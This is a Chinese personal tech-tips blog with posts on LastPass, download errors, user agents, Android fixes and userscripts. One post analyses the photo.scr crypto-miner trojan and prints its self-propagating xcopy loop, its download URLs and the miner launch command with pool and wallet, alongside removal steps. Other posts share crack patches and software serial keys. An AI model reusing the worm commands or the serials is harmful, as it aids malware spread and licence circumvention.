星期日, 二月 25, 2018

90 解决 Lastpass 相互踢出的问题 | 等效域名的设置

Lastpass用了4年多, 确实是个不错的保存密码的好软件(没有给我广告费).
去年下半年的工作很忙, 经常要用到三个电脑, 一个键鼠跨屏操作我用了Input Direct完美解决, 但是浏览器里这个Lastpass扩展程序当时确实让我头疼了许久. 为什么呢?
在LastPass的默认设置里, 当一个浏览器扩展登录之后, 另一个就会被踢出.提示: 您的LastPass会话似乎已经过期, 请重新登录.
类似你在两个电脑上登录同一个QQ号. 先登录的就会提示被踢下线.
有多个电脑时, 这样来回折腾就很烦.
后来我闲得没事折腾lastpass的设置的时候, 发现它隐藏在高级设置里, 竟然可以多端登录!
方法如下:
1. 打开保险库↑
2. 点击 显示高级设置↑
3. 把 从另一台设备登录时自动登出其它设备 取消勾选, 然后点更新, 输入Lastpass主密码, 保存成功👌
=========================
下面说一下等效域名. 什么是等效域名? 举个例子吧, 比如优酷和土豆合并了. 土豆账号=优酷账号. 但是当你在tudou.com的页面上, 并没有看到lastpass可以填写你的youku账号, 这就是没有设置等效域名.
这种例子还有很多, 我列举一下我自己常用的等效域名:

    lofter.com,163.com,
zol.com,zol.com.cn,
qq.com,weiyun.com,tenpay.com
so.com,360.com,360.cn
pps.tv,iqiyi.com
pptv.com,suning.com
yandex.com,yandex.ru
youku.com,tudou.com
microsoft.com,skype.com,live.com,microsoftonline.com

wo.cn,wocloud.com.cn
ccb.com,ccb.com.cn

在哪设置呢? 还是在 保险库 的 账户设置 中, (参见 本文第二张图)
找到 等效域名, 并一组一组添加, 像上图那样.
* 尽管有些大厂都会注意这个, 比如阿里 腾讯都会统一登录界面, 阿里的login.taobao.com, 腾讯的ptlogin, 但是其它一些公司可能没有注意这个, 比如微软 ;-)

星期六, 二月 24, 2018

89 迅雷下载总是提示"您输入的URL不合法, 请重新输入"的解决办法

我经常发现我百度盘里的链接, 调用迅雷下载的时候, 就会出现"您输入的URL不合法, 请重新输入"的错误提示. 我用浏览器自带的下载就是好的↓

后来发现是因为文件名的参数导致的, 下面我们就来折腾一下.
到了迅雷那一步, 点击立即下载, 会提示URL不合法. 这时候我们复制出下面提示错误的地址.

然后搜你的文件名, 比如我这文件名里有英文的Proxifier, 我就搜 Proxifier↓

发现这个巨长无比的链接里, 有两处, 对应两个参数, fin和fn. 一般都是filename的意思.
好了, 我们精简一下这两个参数, 把它们都改短. 比如:

把后面urlencode的那些都删掉, 留一个名字+后缀即可.
改好了↓

把这个链接再复制进迅雷的下载窗口里↓ 点击立即下载.

一下子就下载完成了. 以至于没有截图的时间emmmmm...


总之一句话, 提示"您输入的URL不合法, 请重新输入"错误的一般都是: "http://1.com/download?a=aaaaaa&b=bbbbb&c=cccccc" 这种参数型的下载链接, 而且文件名过长.

88 发一个 QQ 微信 钉钉 的 User Agent

科普一下User Agent(来自百度百科):
User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

QQ, 不是qq浏览器的ua, 是手机qq自带的. 
Mozilla/5.0 (Linux; Android 6.0.1; MI MAX Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043409 Safari/537.36 V1_AND_SQ_6.2.5_0_RDM_B QQ/6.2.0.2655 NetType/WIFI WebP/0.3.0 Pixel/1080

微信
Mozilla/5.0 (Linux; Android 6.0.1; MI MAX Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043409 Safari/537.36 MicroMessenger/6.5.10.1080 NetType/WIFI Language/zh_CN

钉钉
Mozilla/5.0 (Linux; Android 6.0.1; MI MAX Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/46.0.2490.76 Mobile Safari/537.36 AliApp(DingTalk/4.3.5) com.alibaba.android.rimet/0 Channel/702008 language/zh-CN

如果你想看你手机上安装的qq/微信UA, 发一个查UA的链接给自己, 然后访问即可.
比如:
https://tool.lu/useragent/
http://www.ip138.com/useragent/
https://www.whoishostingthis.com/tools/user-agent/
关于最后一个链接, 原本是whatsmyuseragent的, 后来他们团队联系我修改了, 那就顺带改一下呗.

87 雅虎邮箱 设置自动转发 以及设置为中文

20230226更新: 雅虎已于2020.11月彻底关闭邮件转发, 来源: https://www.cnbeta.com.tw/articles/tech/1049807.htm 以及 https://phone.cnmo.com/news/695987.html


在网上搜索雅虎邮箱如何设置自动转发的文章基本都是08年或者11年的...我还了解到2016.10还关闭自动转发功能防止用户流失.

同事让我帮忙设置一下自动转发, 说是找不到. 我谷歌搜了半天都是上述那些东西. 还是得靠自己动手.
经过折腾, 终于发现了藏得很深的雅虎邮箱自动转发功能.

1. 主界面里打开设置↓

2. 切换为基础版式↓

3. Save, 然后刷新邮箱页面. 快捷键F5. 界面首页变成这样↓

4. Options - Go↓

5. 点开POP & Forwarding, 右边即是↓

这是设置方法, 当然也可以在登录雅虎ID之后, 直接访问(可能需要越狱)
https://mg.mail.yahoo.com/neo/b/options?motype=pop


============
如何将雅虎邮箱修改为中文界面:

当时也是谷歌和百度搜了很久, 都是搜了些过时的或者没用的东西. 要么就是几年前方法, 要么就是修改语言编码. 一点创造力和责任心都没有. 
后来自己倒腾出来了. 放一张图看看效果. 雅虎邮箱工作在用, 我自己才不用这样的邮箱.

修改方法小齿轮settings里已经找不到了. Account settings也没有.
方法就是:
https://mg.mail.yahoo.com/neo/launch?.intl=cn
或者
https://mg.mail.yahoo.com/neo/launch?.intl=hk
实测是有效的, 不然我也不会有那张截图.
如果不行, 再加个参数 &.lang=zh-Hans-CN
想用新版的点切换新版就好.
20230226更新: 
在设置中可以直接切换, 或者访问: 

垃圾邮箱😒

86 安卓 禁用 冻结 系统应用后 无限重启 修复方法

昨天晚上手贱禁用了几个系统软件, 今天早上手机无限重启打不开, 闹铃都没有, 差点迟到... 
手机是小米Max1, MIUI8.2. 6月10号才刷的系统... 
在网上找到了解决方法. 
我几句话概括一下, 懂的人自然知道我在说啥. 
1. 首先要有recovery, 反正能管理文件的即可. 我用的是TWRP. 我博客之前提供过miui8专用的(至于是不是所谓的专用不知道, 反正我一直在用, 能用就行, 哈哈)中文版. 参见63 小米MAX 新机 miui7升miui8(第三方修改ROM)心得 及 禁用冻结列表的文末链. 
2. 在它无限重启的过程中, 长按 音量+ 和 电源键. 进入recovery模式. 
3. 删除 /data/system/users/0/package-restrictions.xml 这个文件. 或者想办法替换为空(替换为空文件 我没试过). 
4. 之后系统会重建优化, 时间比较长, 取决于你安装了多少软件. 有进度条提示你进度的~ 
我的手机, 虽然无限重启, 但是fastboot(一个兔子戴个雷锋帽那个)还是能进的, 如果你没有recovery, 试一下看能不能从fastboot找突破. 

85 Quick View Plus 13 破解补丁 32位 和 64位

20180224: 先科普一下QV是个什么软件: 支持查看超过200种应用程序所创建的文件和文档,包括字处理、数据库、电子表格、图形等等,你甚至不需要打开Office程序就可以直接查看Word和Excel文档、你所要做的只是在文件上单击鼠标右键,它可以作为Netscape Navigator 2.0及更高版本的plug-in,或者Internet Explorer的一个ActiveX文档服务器,你甚至可以直接用它查看HTML文档.是一个功能强,运行快,与Windows无缝衔接的文件查看器.


在52pojie看到这个帖子: 
楼主说网上只有32位的. 于是他就破解了个64位的. 
刚才试用了一下Quick View Plus 13 的64位版, 亲测52原帖的补丁有效, 但是很多格式不支持... 像我用notepad++编辑的txt. 还有我们批量上传用的xlsm表格, 都不支持... 我很懵逼. 
看作者说只有32位的, 本着强迫症的原则, 又找来了32位的破解补丁. 不过没有测试. 因为要嵌入explorer.exe, 嫌麻烦懒得安装和卸载都要重启电脑... 发给你们自己测试. 32位破解补丁我没有亲自测试.
文末链的附件, 只包含32位和64位的破解补丁dll文件, 直接复制替换掉官方同名文件就好. 在 \Quick View Plus\Program\ 下. 建议备份. 
原版下载地址: [32位]  [64位]
破解补丁下载地址(两个都一样, 选其一): 

84 解决lofter博客总是提示Facebook授权过期的问题

以前我在lofter的主页设置里绑定过twitter和facebook, 后来不见了, 现在一发博文就提示我facebook绑定过期什么的... 
下面说一下方法: 
1. 进到自己的博客首页, 比如chermy.lofter.com, 在下图的位置(先登录你的网易账号), 点开"主页设置". 
2. 点开同步, 在这里右键并 审查元素 , 你直接f12的话不能定位. 所以右键比较好. 
3. 在<div class="m-tbu">下, 把所有的display:none;去掉. 修改方法, 双击, 退格, 回车. 记住是m-tbu的div下. 看效果图: 
2017/06/26 补充一张图, 就像这样, 点 忽略 就好了. 

83 Shazam Lite V1.2 去除国家限制版. 只有 1.02MB 的 Shazam, 官方精简版

原帖来自xda-developers, 地址: https://xdaforums.com/t/app-shazam-lite-no-region-restriction.3477858/

20240904 更新: v1.1 版似乎有问题已经不能用了, 上文的 xda 地址中已更新了 v1.2, 文件大小增加了约 300KB, 并要求 android 8.0 及以上设备使用, 截止发文之时, v1.2 我已经正常用了将近两年 (运行在 android 13 之上), 另外 android 14 也测试过可以使用. 因为懒得维护博客附件了, 所以点击下面的 version 1.2.0 链接下载吧, 如果失效了, 可以在这里评论, 我会立即收到邮件; 或在 xda 论坛反馈给发布者.

[转载]

Version 1.2.0 ARM/ARM64 (v5) Updated! (Requires Android 8.0 or higher)

All credit for this lean and mean version of Shazam goes to their developers of course.

Current changes (v5):

    Removed region restriction
    Added landscape support (respecting user's rotation setting)
    Combined ARM and ARM64 versions into one APK

NOTE: The 5 song upgrade banner and 20 song history limit no longer seems to be implemented in the latest unmodified version. Let me know if you manage to hit a similar limit.

Last edited: Nov 16, 2022

 

以下内容发布于 20180224, 已过时, 仅存档, 勿看.
上一张自己使用 v1.1 的截图:


优点: 体积小, 安装包只有704KB. xda的修改版去除了使用国家限制. 
缺点: 只有5条识别记录. 

82 能在当前网页做笔记的js脚本 pagenote网页笔记 修改为ALT+鼠标左键添加笔记

一个基于localstorage的js脚本. 
两个月前给自己多加了个4G的内存条, 也换上了120GB的SSD. 这样电脑的性能就上升了一个档次, 以前想用但是因为内存和硬盘原因一直停用的扩展和脚本都打开了. 后来就发现这个小记事本非常好用. 所以推荐给大家. 
先给大家看看截图
这个小脚本原作者是写的shift+鼠标左键, 那样很不方便, 而且shift在选长文本的时候会用到, 所以折腾了一下, 将它改为了alt+鼠标左键. 先说说怎么用吧, Chrome系列的浏览器, 去到谷歌浏览器应用商店中 [安装 Tampermonkey ]. 之后再去 Greasyfork [安装这个脚本]. 细节就不多说了, 相信折腾浏览器的应该都会操作. 下面讲一下怎么改代码. 
在图中的位置: 
也就是270行, 把原来的shift改成alt就行啦. 
如果不喜欢黄色的主题, 也是可以改的. 
头部背景在82行改, 
内容背景在98行改, 
说说注意事项和优缺点
1. 你保存的笔记, 在同一个页面, 比如 chermy.lofter.com 和 chermy.lofter.com/?a=123 这样的两种情况下, 都可以显示的, 但是如果换到 chermy.lofter.com/page/1 这样的话, 就不会显示了. 
2. 不支持标题修改. 标题为日期. Local Storage 中的 keyName 不能修改, 我改成中文会消失. 除非改回来. 
3. 同域名下的笔记都可以在 审查元素-Resources-Local Storage 中找到, 如图: 
有一条chermy.的, 还有一条www.的. 
4. 只要不清除, 它会一直存在. 360极速只要不选这项就行: 
5. 不支持导入导出. 作者已经不再更新这个脚本了, 它只是一个方便临时记笔记的工具. 
6. 同一页面支持多个笔记. 

最后送上一个有道笔记官方的脚本, 添加到书签, 下次看到有什么好文章, 点一下, 就可以摘录了. 
javascript:(function(){CLIP_HOST='http://note.youdao.com/yws';try{var x=document.createElement('SCRIPT');x.type='text/javascript';x.src=CLIP_HOST+'/YNoteClipper.js?'+(new Date().getTime()/100000);x.charset='utf-8';document.getElementsByTagName('head')[0].appendChild(x);}catch(e){alert(e);}})();
注意https网页需要点"加载不安全的脚本"哦~

81 WPS个人版 修改 带联网功能 免安装版 V10.1.0.6382 附 WPS Pro 专业版

终于在zdfans上找到了一个带联网的修改版. 
看图:
我的WPS默认是关闭的, 这点很不错. ↑
云服务功能↑
启动图, 没广告↑

再送一个zdfans分享的专业版, 见文末链. 菜单-帮助-激活产品, 输入码注册激活即可(专业版和个人版对于我日常的使用来说感觉是一样的...)

80 一个可用的ebk3转txt工具

昨天晚上帮人找一本电子书, 找了很久发现完整版只有ebk3格式的, 于是又去找ebk3转txt的工具, 找了好久才找到, 不得不吐槽百度知道沙比真是多. 
为防止百度链失效, 分享出来. 另附一本ebk3格式的电子书, 大家可以练练手. 

79 UsersCloud 桌面客户端 免安装版

UsersCloud在线上传实在蛋疼, ftp又尼玛老断老断, 之前用过它的桌面客户端, 必须安装后才能用, 我用7zip提取出来总是说我连接服务器错误...我也是醉了. 
昨天突发奇想用沙盘跑了一下, 原来是将配置文件uploaderfm.conf安装到 %USERPROFILE%\.upload\ 了... 
自己写了一个批处理:
@echo off
color 0a
title UsersCloud
if exist %USERPROFILE%\.uploader (
rd /q /s %USERPROFILE%\.uploader
echo 卸载完成. 
) else (
md %USERPROFILE%\.uploader
echo [General]>%USERPROFILE%\.uploader\uploaderfm.conf
echo server=http://userscloud.com>>%USERPROFILE%\.uploader\uploaderfm.conf
echo maxthreads=10>>%USERPROFILE%\.uploader\uploaderfm.conf
echo logenabled=false>>%USERPROFILE%\.uploader\uploaderfm.conf
echo logfile=>>%USERPROFILE%\.uploader\uploaderfm.conf
echo 安装完成. 目录为: "%USERPROFILE%\.uploader"
)
pause
安装卸载一体的. 这样就不用安装啦. 
运行之后不能点开始上传的按钮, 这个bug是本来就有的, 不是我安不安装的问题.
Options -> Start Upload Immediately 勾上, 退出重进一下就行. 

附一个免安装版. 原版下载链接是 https://userscloud.com/cl885hy31zlv, 也可以访问首页获取最新版. 新不新都是一个烂样... 对了, 我加了个upx压缩壳, 因为它体积很大看不惯. 不喜欢的用工具再脱了就好, 或者你自己下载官版用7zip提取. 

78 photo.scr FTP矿机木马的分析和清理

第一次发现这个木马的时候是在上班, 突然发现公司的服务器上有这个可疑的文件, 它是这样的图标(右边是正常的文件夹):

赶紧用任务管理器打开一看, 晚了, 已经中招了. 当天用某某急救箱清理了一下, 看来没有什么大问题了. 周末闲来无事, 就在网上找了找, 并简单分析了一下. 感兴趣的请往下看. 另外为什么说它是矿机木马, 下文中也会提到. 文末链附photo.scr木马文件, 密码123

腾讯哈勃没有多大卵用的分析系统链接: https://habo.qq.com/file/showdetail?pk=ADEGZl1tB2AIMFs4
国外某安全网站的分析链接: https://www.guardicore.com/2016/06/the-photominer-campaign/
以下内容都是自己分析的, 与两个链接无关. 
它在后台都干了些什么? 
1. 将自身通过xcpoy命令复制到每一个磁盘的根目录下. 每5秒执行一次复制自身的命令: ↓
"C:\Windows\System32\cmd.exe" /c for %i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z) do xcopy /y "D:\Test\Photo.scr" %i:\
这张图是沙盘里的: ↓
2. 从 http://stafftest.ru/test.html?0 的div里下载矿机配置文件. 内容我只截个图. ↓
3. 然后从 http://u.lduxnfz.com/tt/ei.js 解密数据. ↓
4. 将解密的数据放到 %Temp% 文件夹下, 文件名为 pools.txt, 我的是 C:\Users\Administrator\AppData\Local\Temp\pools.txt, 这个pools.txt的内容如下: 
stratum+tcp://mine.moneropool.com:3333
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://xmr.prohash.net:7777
stratum+tcp://pool.minexmr.com:5555
并在同目录下生成(或下载) NsCPUCNMiner32.exe 文件, 或者 NsCPUCNMiner64.exe, 并通过从 http://stafftest.ru/test.html?0 获取到的参数开始运行. 比如:
C:\Users\Administrator\AppData\Local\Temp\NsCpuCNMiner32.exe  -dbg -1 -o stratum+tcp://mine.moneropool.com:3333 -t 1 -u 4Ahxep5d8sdfVfN4XGPTQyUSpLm7gKqYvgqGzxf5raLLZAHQ7dn2oBzYdFCB3M3Gfz74CJQAs7DSMiNFvD1ykAbgSiAzCd4 -p x
然后你的电脑就沦为了矿机. CPU飙升. 
可惜我是在沙盘里运行的, 矿机不支持在虚拟机运行: ↓
5. 这个木马好像还在用匿名的ftp进行传播? 这个不确定, 只是怀疑. 随便访问了一个, 发现已经被加上密码了. ↓
只是一个简单的矿机木马, 技术含量不高, 中了招的朋友可以通过以下步骤删除木马: 
  1. 打开任务管理器, 结束 NsCPUCNMiner32.exe | NsCPUCNMiner64.exe | photo.scr 这三个进程. 64的那个不一定有. 
  2. 删除所有磁盘根目录下的 photo.scr 文件. 
  3. 删除 %Temp% 文件夹下的 pools.txt | NsCPUCNMiner32.exe | NsCPUCNMiner64.exe 这三个文件, 64的那个不一定有. 
  4. (此项步骤可选, 用于防止再次中招) 将 stafftest.ru | www.stafftest.ru | u.lduxnfz.com 这三个地址用hosts屏蔽为127.0.0.1
  5. (此项步骤可选, 用于防止再次中招) 将 NsCPUCNMiner32.exe | NsCPUCNMiner64.exe | photo.scr 这三个进程用iHtool工具加入IFEO映像劫持. 
  6. (此项步骤可选, 用于防止再次中招) 如果你的电脑正在运行 ftp server, 设置一个密码或者用ssl加密(更改端口也可). 
样本见博客顶部的网盘链接

77 3D Space Tour Screensavers Collection 3D宇宙屏保 合集

fpsoftlab的一套经典屏保, 
该合集含有
Earth3D
Galaxy3D
Mars3D
Moon3D
Saturn3D
注意: 合集没有 Jupiter: 3D Space Tour / 2002 FireMagic! / 2000th FireStorm / 2000th HellFire 这四个. Jupiter的破解版没找到, 而且它含有自校验, 断网载入破解补丁也没用. 该合集及破解补丁来自[ThemeX], 感谢坛主@拿起筒的枪给的论坛注册码~
由于原帖提供的是五个安装包, 折腾起来很是繁琐, 于是我将它们复制出来, 就当是提取的单文件版吧(废话, 软件本身就是单文件的), 不过这样不支持左侧选择, 并且每次启动设置的时候会提示找不到安装路径. 问题基本可以忽略. 
提供的五个已经经过破解, 破解补丁是: 3DSpaceTour.Universal.Crack.(All Tours) -PROPER-.NMA.exe, 所以你下载之后应该可以直接打开用. 界面会是这个样子的: 
( 右边复选框里的字由于我电脑缩放125%的原因排版错误了, 内容是: Ignore mouse move ( Demo mode ), 虽说这个是demo但是实测还是有效的. )
好吧好吧, 上图:
也顺便提供一下 Earth 和 Moon 可用的注册码(Company那一行随便填): 
Moon:
Paul Jackson
6E7E-405C-4A9B

Earth:
Thomas Gross
CE71-7BDC-F62A